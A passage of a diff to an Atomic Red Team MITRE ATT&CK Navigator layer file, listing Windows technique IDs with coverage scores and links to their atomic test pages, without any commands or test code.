ueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1187","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1557.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"},{"techniqueID":"T1557","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1567","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1588.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"},{"techniqueID":"T1588","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]} \ No newline at end of file +{"version":"4.3","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View 